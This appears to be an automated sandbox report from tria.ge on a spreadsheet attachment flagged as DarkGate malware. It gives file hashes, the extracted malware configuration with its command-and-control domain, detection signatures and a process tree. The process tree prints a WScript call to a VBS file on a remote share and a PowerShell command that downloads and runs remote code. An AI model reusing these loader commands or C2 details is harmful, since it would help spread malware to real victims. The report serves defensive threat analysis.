Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
28/02/2024, 21:50
Static task
static1
Behavioral task
behavioral1
Sample
scan-28-02-24_2843.xlsx
Resource
win7-20240221-en
General
-
Target
scan-28-02-24_2843.xlsx
-
Size
29KB
-
MD5
9c1ebbb1a85ed19d809b78267ed9ab73
-
SHA1
dba2c5d28e61109fe42682c22d9cef0075f05283
-
SHA256
87ef4188917d7e4b3fc3b91a0b5a2634aeb71557e29239cb8b72a5d8369eaf76
-
SHA512
b7be6a97176a63d75dcd6330035dad65ecf32992918a4d98f5876a4f9c471d4bced6535b4b621a471b99643e35684dad760a5da6393276e6684118a16859e171
-
SSDEEP
768:wnEQpllh7tAafroiianGoHoJ+yWWn0WhtSY:nQJh7Lro4ntD+0ASY
Malware Config
Extracted
darkgate
admin888
cayennesxque.boo
-
anti_analysis
true
-
anti_debug
false
-
anti_vm
true
-
c2_port
80
-
check_disk
true
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
ekoRFSqn
-
minimum_disk
50
-
minimum_ram
7000
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
admin888
Signatures
-
Detect DarkGate stealer 4 IoCs
resource yara_rule behavioral2/memory/1964-63-0x0000000005BC0000-0x0000000005F0F000-memory.dmp family_darkgate_v6 behavioral2/memory/1964-64-0x0000000005BC0000-0x0000000005F0F000-memory.dmp family_darkgate_v6 behavioral2/memory/4304-100-0x0000000005680000-0x00000000059CF000-memory.dmp family_darkgate_v6 behavioral2/memory/4304-101-0x0000000005680000-0x00000000059CF000-memory.dmp family_darkgate_v6 -
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2904 1584 WScript.exe 27 Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 5028 1584 WScript.exe 27 -
Blocklisted process makes network request 8 IoCs
flow pid Process 41 4232 powershell.exe 42 4232 powershell.exe 44 4232 powershell.exe 45 4232 powershell.exe 59 760 powershell.exe 60 760 powershell.exe 61 760 powershell.exe 62 760 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 2 IoCs
pid Process 1964 AutoIt3.exe 4304 AutoIt3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AutoIt3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AutoIt3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AutoIt3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AutoIt3.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1584 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4232 powershell.exe 4232 powershell.exe 4232 powershell.exe 760 powershell.exe 760 powershell.exe 760 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4232 powershell.exe Token: SeDebugPrivilege 760 powershell.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
pid Process 1584 EXCEL.EXE 1584 EXCEL.EXE 1584 EXCEL.EXE 1584 EXCEL.EXE 1584 EXCEL.EXE 1584 EXCEL.EXE 1584 EXCEL.EXE 1584 EXCEL.EXE 1584 EXCEL.EXE 1584 EXCEL.EXE 1584 EXCEL.EXE 1584 EXCEL.EXE 1584 EXCEL.EXE -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 1584 wrote to memory of 2904 1584 EXCEL.EXE 95 PID 1584 wrote to memory of 2904 1584 EXCEL.EXE 95 PID 2904 wrote to memory of 4232 2904 WScript.exe 96 PID 2904 wrote to memory of 4232 2904 WScript.exe 96 PID 4232 wrote to memory of 1964 4232 powershell.exe 98 PID 4232 wrote to memory of 1964 4232 powershell.exe 98 PID 4232 wrote to memory of 1964 4232 powershell.exe 98 PID 1584 wrote to memory of 5028 1584 EXCEL.EXE 100 PID 1584 wrote to memory of 5028 1584 EXCEL.EXE 100 PID 5028 wrote to memory of 760 5028 WScript.exe 101 PID 5028 wrote to memory of 760 5028 WScript.exe 101 PID 760 wrote to memory of 4304 760 powershell.exe 103 PID 760 wrote to memory of 4304 760 powershell.exe 103 PID 760 wrote to memory of 4304 760 powershell.exe 103
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\scan-28-02-24_2843.xlsx"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\147.45.197.186\share\scan.vbs"2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'cayennesxque.boo/qdfjfvph')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4232 -
C:\temp\AutoIt3.exe"C:\temp\AutoIt3.exe" script.a3x4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:1964
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\147.45.197.186\share\scan.vbs"2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'cayennesxque.boo/qdfjfvph')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:760 -
C:\temp\AutoIt3.exe"C:\temp\AutoIt3.exe" script.a3x4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:4304
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD556c43715e0e7fa58012d8a5769d8d568
SHA14370ca3436f2e3a95b47a728503a2c22a5a5fa39
SHA2568ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5
SHA512b8da8defb2080d04babc3e676cc9686c7f71b15eeca0e738ca75c9fb7af968eba8d3daff5bc2e31d471e26568df2f319ec1f4b00bf43ffb60460e5df787947ed
-
Filesize
1KB
MD51bea0e7ccc10156e19292d05c6921f82
SHA18ee847fc160cdfad17dc94aa4e370ebe1a35625f
SHA2565019fa6d98b6916bd68c04e1c6f0085d7583a25f2c2ccf0c90af1e4686bb09a4
SHA5128fd7e7e405e59c8ad35595562140011331552cef3537bc3238f1d3f17336a7364ce0b83568951e916f86d4e70bc51488021db13005ed7cf40da3b2b9f26546a9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
32B
MD5abdfed2e8e36c069739dd9603f3f1a6c
SHA1b129e88400c7e57891b576dc5f737bb7cb58ffa1
SHA256be796b22c903bf60693df6c8097522368179bdfcbf7984838cf70ac00cf24d85
SHA51218418a11622d70077c34f0e2b0308caeb10821dc613d6f2d530b9245cbab7a81a98cea49d8de0a9c0a0500ffa9edf17e909de99b0095dd0096146d9f2002daf1
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
468KB
MD55dc0a5b884e44209941ec370406fbcc5
SHA1b06cf5d11a5a7252afff61c1a787fb27ff126e28
SHA25668acdae5c94dcfc0adaa1e1965166b3d2b4b8f1f889bce4610dbd1a0b72e2bc9
SHA5120e11e3281175b0c9bdbe2474830fcd38de05e18e6edac4c1b0cd9c334ced89738c2eaf1bdf90c5e6b08c20faf96a6bdd574a472f81bc84355b69fc60832cbb53
-
Filesize
76B
MD58b428b9d5c33c6ed79386d4c10600cd8
SHA10f4bbafe0abe6cf3f3542d49a9eed5db84f9ef7e
SHA256424ef27370eb401871db935fc3fa3811179f5786fe777182550299aa8230f6b6
SHA512307e7d4228577259a4cc3874da09408e45401b46739ccaa96e0bd5a0f6aedb362dd97528aa2acc79d3698710d85c283afd0649ec412dcba8c9f8df1339e3b892